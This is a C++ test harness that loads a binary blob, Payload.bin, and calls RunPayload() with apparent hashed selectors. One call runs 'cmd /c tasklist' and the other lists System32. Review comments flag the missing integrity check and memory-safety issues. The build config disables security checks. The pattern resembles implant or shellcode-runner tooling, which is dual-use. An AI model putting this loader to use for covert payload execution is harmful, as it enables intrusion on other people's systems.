#include "Interpreter.h"
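/*
* ⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
* Required build configuration:
* 1. Release x64
* 2. General
* Platform Toolset: LLVM (clang-cl)
* 3. C/C++
* Optimization: Optimization (Disabled)
* Code Generation: Runtime Library (Multi-threaded); Security Check (Disable Security Check, i.e. /GS-)
* 4. Linker
* Manifest File: Generate Manifest (No)
* Debugging: Generate Debug Info (No)
*/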
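/*
 * Test harness: reads ..\Converter\Payload.bin into a heap buffer and passes
 * it to RunPayload() twice, each time with a different integer selector and
 * argument string, printing the output each call reports.
 *
 * NOTE(review): the file is opened through a path relative to the current
 * working directory and handed to RunPayload() with no integrity or
 * provenance check, so whoever can write that file controls what
 * RunPayload() receives. Run this only in an isolated test environment.
 *
 * Returns 0 on every path, as the original did.
 * NOTE(review): a non-zero status on failure would let callers detect errors.
 */
int main() {
    // Read the payload. Share mode is 0 (exclusive); the original passed NULL,
    // which is the same value but the wrong type for a DWORD argument.
    HANDLE hFile = CreateFileA("..\\Converter\\Payload.bin", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "Failed to open Payload.bin." << endl;
        return 0;
    }

    // Reject a failed size query and an empty file before allocating.
    DWORD payloadSize = GetFileSize(hFile, NULL);
    if (payloadSize == INVALID_FILE_SIZE || payloadSize == 0) {
        cout << "Failed to get the size of Payload.bin." << endl;
        CloseHandle(hFile);
        return 0;
    }

    PVOID pPayload = malloc(payloadSize);
    if (pPayload == NULL) {
        CloseHandle(hFile);
        return 0;
    }

    // A failed or short read would leave part of the buffer uninitialized,
    // so require that the whole file was read before using it.
    DWORD readFileLen = 0;
    BOOL readOk = ReadFile(hFile, pPayload, payloadSize, &readFileLen, NULL);
    CloseHandle(hFile);
    if (!readOk || readFileLen != payloadSize) {
        cout << "Failed to read Payload.bin." << endl;
        free(pPayload);
        return 0;
    }

    // NOTE(review): binding a string literal to char* is kept because
    // RunPayload()'s parameter type is not visible here; the literal must not
    // be written through.
    char* commandPara = "cmd /c tasklist";
    int commandParaLen = strlen(commandPara) + 1; // length includes the terminating NUL
    // Initialized so that a call which reports output without setting the
    // pointer cannot make the code below write through an indeterminate address.
    char* outputData = NULL;
    int outputDataLen = 0;
    PVOID specialParaList[] = { NULL };

    // NOTE(review): the integer constants look like selectors identifying the
    // routine to run inside the payload - confirm against Interpreter.h.
    if (RunPayload((PBYTE)pPayload, payloadSize, -504283653, commandPara, commandParaLen, outputData, outputDataLen, specialParaList) && outputDataLen > 0 && outputData != NULL) {
        // NOTE(review): this writes at index outputDataLen, one past the
        // reported data; it is only in bounds if RunPayload() allocates at
        // least outputDataLen + 1 bytes - verify against the callee.
        *(outputData + outputDataLen) = '\0';
        cout << outputData << endl;
    }

    // NOTE(review): ownership of outputData is not visible here; if
    // RunPayload() allocates it, the first buffer is never released.
    commandPara = "C:\\Windows\\System32\\*";
    commandParaLen = strlen(commandPara) + 1;
    outputDataLen = 0;
    if (RunPayload((PBYTE)pPayload, payloadSize, 1280936002, commandPara, commandParaLen, outputData, outputDataLen, specialParaList) && outputDataLen > 0 && outputData != NULL) {
        *(outputData + outputDataLen) = '\0'; // same one-past-the-length assumption as above
        cout << outputData << endl;
    }

    free(pPayload);
    return 0;
}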